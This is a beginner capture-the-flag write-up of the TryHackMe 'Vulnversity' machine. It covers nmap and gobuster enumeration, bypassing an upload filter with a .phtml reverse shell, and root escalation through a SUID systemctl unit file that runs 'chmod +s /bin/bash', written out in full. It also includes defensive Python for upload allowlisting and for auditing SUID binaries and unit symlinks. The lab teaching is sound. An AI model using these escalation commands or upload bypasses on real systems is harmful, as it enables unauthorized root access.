Hello, today we're doing Vulnversity from tryhackme.com, an easy machine aimed at beginners. It involved finding an upload form, then exploiting that poorly secured upload form to obtain a shell on the box. For privilege escalation we found that systemctl has the SUID bit set; checking GTFOBins gives us a way to run commands as root with it.
```
# Nmap 7.91 scan initiated Mon Sep 13 22:32:58 2021 as: nmap -sC -sV -oN nmap/vulnversity 10.10.209.201
Nmap scan report for 10.10.209.201
Host is up (0.026s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
| http-vulners-regex:
|   /main.pl:
|_    cpe:/a:squid-cache:squid:3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2021-09-13T22:33:21-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-09-14T02:33:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 13 22:33:34 2021 -- 1 IP address (1 host up) scanned in 36.66 seconds
```
Six ports open. We'll start by enumerating FTP, then work through the other ports as we go.
If anonymous login was enabled, nmap would have pointed that out, but tools may fail from time to time and I always like checking manually anyway.
Anonymous login wasn’t enabled and no public exploits are available for that version. Moving on…
Nothing to see here… Moving on.
Web server - 3333
Nothing on the page is clickable, so it is most likely a static page. Checking the source code…
Well, nothing… Starting gobuster with different extensions.
Let’s check other things while gobuster is running.
Going to /robots.txt
404, but the server discloses which Apache version the web server is running on. This would definitely be a finding on a pentest :)
Checking what gobuster’s doing
And we get a hit on /internal , let’s check that out.
Cool, let's try uploading a PHP file.
Trying to upload a PHP reverse shell from pentestmonkey.
And we get "Extension not allowed", but what if the form only checks for .php and doesn't check other extensions? What if we try uploading a .phtml, for example? Will that do the trick?
And hey, it says "Success". Now the question is where the file has been uploaded. Let's try /internal/shell.phtml (also starting a netcat listener in the background).
Not here, but if we remember correctly, gobuster found an images directory.
Unfortunately, we don’t see our shell here, let’s try the root directory
Not here… Let's take a step back and run gobuster again against the /internal directory.
And hey, we get a hit right away. Let’s go to /uploads
We've already started the listener in the background, so let's just click the file and see if we get a shell back.
We do. I've stabilized the shell and read user.txt :)
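The reason the .phtml upload works is that the form rejects a hard-coded .php suffix while Apache's PHP module handles more than one extension. The Python below is an added example, not code from the box or this post; it contrasts that blocklist with an allowlist check. The allowlist contents and the handler pattern (assumed to be the stock Ubuntu php module FilesMatch regex) are assumptions.

```python
import os
import re

# Assumption: stock Ubuntu Apache php module config, which routes ".+\.ph(ar|p|tml)$" to the
# PHP interpreter. That is why .phtml executes even though the form only blocks .php.
APACHE_PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")
ALLOWED = {"jpg", "jpeg", "png", "gif", "pdf"}   # assumed allowlist for the form

def weak_check(filename):
    """The box's approach: a blocklist that rejects only a literal .php suffix."""
    return not filename.endswith(".php")

def strict_check(filename):
    """Hardened approach: plain basename, exactly one extension, lowercased, on the allowlist."""
    base = os.path.basename(filename)
    if base != filename or base.startswith("."):
        return False                      # path components or dotfiles are rejected outright
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False                      # no double extensions such as shell.php.png
    return parts[1].lower() in ALLOWED

def would_execute(filename):
    """Would Apache hand a file with this name to PHP once it sits in a served directory?"""
    return APACHE_PHP_HANDLER.match(filename) is not None

def evaluate(names):
    """Per candidate name: (accepted by weak check, accepted by strict check, executes as PHP)."""
    return {n: (weak_check(n), strict_check(n), would_execute(n)) for n in names}

# Constructed candidates, including the two the write-up tried
CANDIDATES = ["shell.php", "shell.phtml", "logo.png", "shell.php.png", "shell.phar"]

if __name__ == "__main__":
    for name, (weak, strict, runs) in evaluate(CANDIDATES).items():
        print(f"{name:15} weak={weak!s:5} strict={strict!s:5} executes_as_php={runs}")
```

The allowlist alone is not the whole fix: store uploads under a server-generated name and make sure the upload directory has no PHP handler at all, so even a misjudged extension cannot run.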
Now, we are www-data, which is a service account. How can we escalate our privileges to another user or even root? I've tried simple things like sudo -l and finding SUID binaries with find.
There is one thing that really stands out, and that is systemctl: you don't usually see that with the SUID bit set. Let's check it on gtfobins.github.io; maybe we can escalate our privileges with it.
Well, good news, let’s click on “SUID”
Let’s try escalating our privileges with it.
Adjusting it a bit, this is what we're going to run:
```sh
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
```
Let's modify "ExecStart" in order to set the SUID bit on /bin/bash:
```sh
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
```
Let's try this.
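From the defender's side, this escalation leaves two artefacts: an unexpected setuid bit on systemctl, and a unit symlink under /etc/systemd/system pointing into /tmp (what `systemctl link` creates). The Python below is an added audit example, not code from the post or the box; the SUID baseline and the sample entries are constructed assumptions.

```python
import os
import stat

# Assumed baseline of SUID binaries normally present on an Ubuntu host (illustrative, not exhaustive)
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/mount", "/bin/umount", "/bin/ping",
}
# No legitimate unit file should be linked from a world-writable or home directory
UNTRUSTED_UNIT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

def unexpected_suid(entries, baseline=EXPECTED_SUID):
    """entries: (path, st_mode) pairs. Returns regular files with the setuid bit that are not in the baseline."""
    return sorted(p for p, mode in entries
                  if stat.S_ISREG(mode) and mode & stat.S_ISUID and p not in baseline)

def suspicious_unit_links(links):
    """links: (unit_path, symlink_target) pairs. Flags what `systemctl link /tmp/x.service` leaves behind:
    a symlink in /etc/systemd/system whose target lives in an untrusted directory."""
    return sorted(u for u, target in links if target.startswith(UNTRUSTED_UNIT_DIRS))

def scan_host(root="/"):
    """Collect both signals from a live filesystem (needs root to stat everything)."""
    suid, links = [], []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode) and dirpath.startswith("/etc/systemd/system"):
                links.append((path, os.readlink(path)))
            else:
                suid.append((path, st.st_mode))
    return unexpected_suid(suid), suspicious_unit_links(links)

# Constructed sample modelled on this box (modes as os.lstat().st_mode reports them)
SAMPLE_FILES = [
    ("/usr/bin/sudo", 0o104755),
    ("/bin/systemctl", 0o104755),   # setuid root: the odd one out
    ("/bin/ls", 0o100755),
]
SAMPLE_LINKS = [
    ("/etc/systemd/system/tmp.abc123.service", "/tmp/tmp.abc123.service"),
    ("/etc/systemd/system/multi-user.target.wants/ssh.service", "/lib/systemd/system/ssh.service"),
]

if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(SAMPLE_FILES))
    print("suspicious unit links:", suspicious_unit_links(SAMPLE_LINKS))
```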
Well, that was it: an easy box, aimed at beginners. What I want to do with these write-ups is show you the methodology (if beginners are reading this), my thought process and all that stuff. Hope you've learned something new :)